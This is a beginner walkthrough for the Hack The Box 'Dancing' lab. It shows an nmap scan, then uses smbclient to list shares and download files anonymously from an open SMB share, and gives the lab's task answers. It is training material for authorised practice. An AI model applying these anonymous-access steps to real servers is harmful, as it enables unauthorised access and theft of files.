The aim of this walkthrough is to provide help with the Dancing machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
You could use the unset command to remove it after you no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
TASK 1
Question: What does the 3-letter acronym SMB stand for?
A simple internet search should help you out.
server message block
TASK 2
Question: What port does SMB use to operate at?
Just like before, use the internet.
445
TASK 3
Question: What is the service name for port 445 that came up in our Nmap scan?
Use nmap to scan the top 1000 ports on the target machine:
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $nmap $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 10:49 BST
Nmap scan report for 10.129.1.12
Host is up (0.064s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
The default nmap configuration should provide you with the correct service name from the get-go.
microsoft-ds
TASK 4
Question: What is the ‘flag’ or ‘switch’ we can use with the SMB tool to ’list’ the contents of the share?
One way to search for commands (their manual pages really) that contain a specific word (like smb here) is to use apropos. It searches the installed manual pages and descriptions for the provided name (string).
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $apropos smb
cifsdd (8) - convert and copy a file over SMB
filesystems (5) - Linux filesystem types: ext, ext2, ext3, ext4, hpfs, iso9660, JFS, m...
fs (5) - Linux filesystem types: ext, ext2, ext3, ext4, hpfs, iso9660, JFS, m...
libsmbclient (7) - An extension library for browsers and that can be used as a generic ...
mdsearch (1) - Run Spotlight searches against an SMB server
samba (7) - A Windows AD and SMB/CIFS fileserver for UNIX
samba (8) - Server to provide AD and SMB/CIFS services to clients
samba-dcerpcd (8) - This is one of Samba's DCERPC server processes that can listen on so...
smb.conf (5) - The configuration file for the Samba suite
smbcacls (1) - Set or get ACLs on an NT file or directory names
smbclient (1) - ftp-like client to access SMB/CIFS resources on servers
smbcontrol (1) - send messages to smbd, nmbd or winbindd processes
smbcquotas (1) - Set or get QUOTAs of NTFS 5 shares
smbd (8) - server to provide SMB/CIFS services to clients
smbget (1) - wget-like utility for download files over SMB
smbgetrc (5) - configuration file for smbget
smbmap (1) - SMB enumeration tool
smbpasswd (5) - The Samba encrypted password file
smbpasswd (8) - change a user's SMB password
smbspool (8) - send a print file to an SMB printer
smbspool_krb5_wrapper (8) - This is a CUPS printing backend which calls smbspool
smbstatus (1) - report on current Samba connections
smbtar (1) - shell script for backing up SMB/CIFS shares directly to UNIX tape dr...
smbtree (1) - A text based smb network browser
testparm (1) - check an smb.conf configuration file for internal correctness
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
One promising candidate is the smbclient command. Use it’s help option to get to the correct answer.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $smbclient --help
Usage: smbclient [OPTIONS] service <password>
-M, --message=HOST Send message
-I, --ip-address=IP Use this IP to connect to
-E, --stderr Write messages to stderr instead of stdout
-L, --list=HOST Get a list of shares available on a host
-T, --tar=<c|x>IXFvgbNan Command line tar
-D, --directory=DIR Start from directory
-c, --command=STRING Execute semicolon separated commands
-b, --send-buffer=BYTES Changes the transmit/send buffer
-t, --timeout=SECONDS Changes the per-operation timeout
-p, --port=PORT Port to connect to
-g, --grepable Produce grepable output
-q, --quiet Suppress help message
-B, --browse Browse SMB servers using DNS
Help options:
-?, --help Show this help message
--usage Display brief usage message
Common Samba options:
-d, --debuglevel=DEBUGLEVEL Set debug level
--debug-stdout Send debug output to standard output
-s, --configfile=CONFIGFILE Use alternative configuration file
--option=name=value Set smb.conf option from command line
-l, --log-basename=LOGFILEBASE Basename for log/debug files
--leak-report enable talloc leak reporting on exit
--leak-report-full enable full talloc leak reporting on exit
Connection options:
-R, --name-resolve=NAME-RESOLVE-ORDER Use these name resolution services only
-O, --socket-options=SOCKETOPTIONS socket options to use
-m, --max-protocol=MAXPROTOCOL Set max protocol level
-n, --netbiosname=NETBIOSNAME Primary netbios name
--netbios-scope=SCOPE Use this Netbios scope
-W, --workgroup=WORKGROUP Set the workgroup name
--realm=REALM Set the realm name
Credential options:
-U, --user=[DOMAIN/]USERNAME[%PASSWORD] Set the network username
-N, --no-pass Don't ask for a password
--password=STRING Password
--pw-nt-hash The supplied password is the NT hash
-A, --authentication-file=FILE Get the credentials from a file
-P, --machine-pass Use stored machine account password
--simple-bind-dn=DN DN to use for a simple bind
--use-kerberos=desired|required|off Use Kerberos authentication
--use-krb5-ccache=CCACHE Credentials cache location for Kerberos
--use-winbind-ccache Use the winbind ccache for authentication
--client-protection=sign|encrypt|off Configure used protection for client
connections
Deprecated legacy options:
-k, --kerberos DEPRECATED: Migrate to --use-kerberos
Version options:
-V, --version Print version
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
-L
TASK 5
Question: How many shares are there on Dancing?
Use both the -L (list the shares) and the -N (suppress the password prompt) option to list the shares.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $smbclient -p 445 -N -L \\$rhost\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
SMB1 disabled -- no workgroup available
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
4
TASK 6
Question: What is the name of the share we are able to access in the end with a blank password?
Let’s try and access the shares one by one. Both the ADMIN$ and the C$ share are protected. The IPC$ share on the other hand is simply empty. Therefore, the answer must be the last one.
Run the help command to list the possible commands inside your smb connection.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $smbclient -p 445 -N \\\\$rhost\\ADMIN$
tree connect failed: NT_STATUS_ACCESS_DENIED
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $smbclient -p 445 -N \\\\$rhost\\C$
tree connect failed: NT_STATUS_ACCESS_DENIED
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $smbclient -p 445 -N \\\\$rhost\\IPC$
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> help help
HELP help:
[command] give help on a command
WorkShares
TASK 7
Question: What is the command we can use within the SMB shell to download the files we find?
Use help to get a better idea what the commands actually do.
smb: \> help ls
HELP ls:
<mask> list the contents of the current directory
smb: \> help get
HELP get:
<remote name> [local name] get a file
smb: \> help exit
HELP exit:
logoff the server
smb: \> exit
get
SUBMIT FLAG
Question: Submit root flag
Connect to the WorkShares share and look around a bit. Let’s grab and download all the files we find.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $smbclient -p 445 -N \\\\$rhost\\WorkShares
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Mar 29 09:22:01 2021
.. D 0 Mon Mar 29 09:22:01 2021
Amy.J D 0 Mon Mar 29 10:08:24 2021
James.P D 0 Thu Jun 3 09:38:03 2021
5114111 blocks of size 4096. 1751385 blocks available
smb: \> cd Amy.J
smb: \Amy.J\> ls
. D 0 Mon Mar 29 10:08:24 2021
.. D 0 Mon Mar 29 10:08:24 2021
worknotes.txt A 94 Fri Mar 26 11:00:37 2021
5114111 blocks of size 4096. 1751385 blocks available
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \Amy.J\> cd ..
smb: \> ls
. D 0 Mon Mar 29 09:22:01 2021
.. D 0 Mon Mar 29 09:22:01 2021
Amy.J D 0 Mon Mar 29 10:08:24 2021
James.P D 0 Thu Jun 3 09:38:03 2021
5114111 blocks of size 4096. 1751385 blocks available
smb: \> cd James.P\
smb: \James.P\> ls
. D 0 Thu Jun 3 09:38:03 2021
.. D 0 Thu Jun 3 09:38:03 2021
flag.txt A 32 Mon Mar 29 10:26:57 2021
5114111 blocks of size 4096. 1751385 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.6 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \James.P\> exit
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
Once the file containing the flag is found, grab the flag. On a side note, it is always a good practice to check out the other files you may find. It maight give you a clue about what exactly is happening on your target.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ll
total 24K
-rw-r--r-- 1 htb-bluewalle htb-bluewalle 32 May 4 11:20 flag.txt
lrwxrwxrwx 1 root root 24 May 4 08:41 htb_vpn_logs.log -> /var/log/openvpn/htb.log
-rw-r--r-- 1 root root 43 May 4 08:41 my_credentials.txt
lrwxrwxrwx 1 root root 27 May 4 08:41 my_data -> /home/htb-bluewalle/my_data
-rwxr-xr-x 1 htb-bluewalle htb-bluewalle 2.1K May 4 08:40 README.license
-rw-r--r-- 1 htb-bluewalle htb-bluewalle 94 May 4 11:19 worknotes.txt
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $cat worknotes.txt
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing ┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $cat flag.txt
<flag>┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
flag
Make sure to terminate the target box before you continue with the next machine!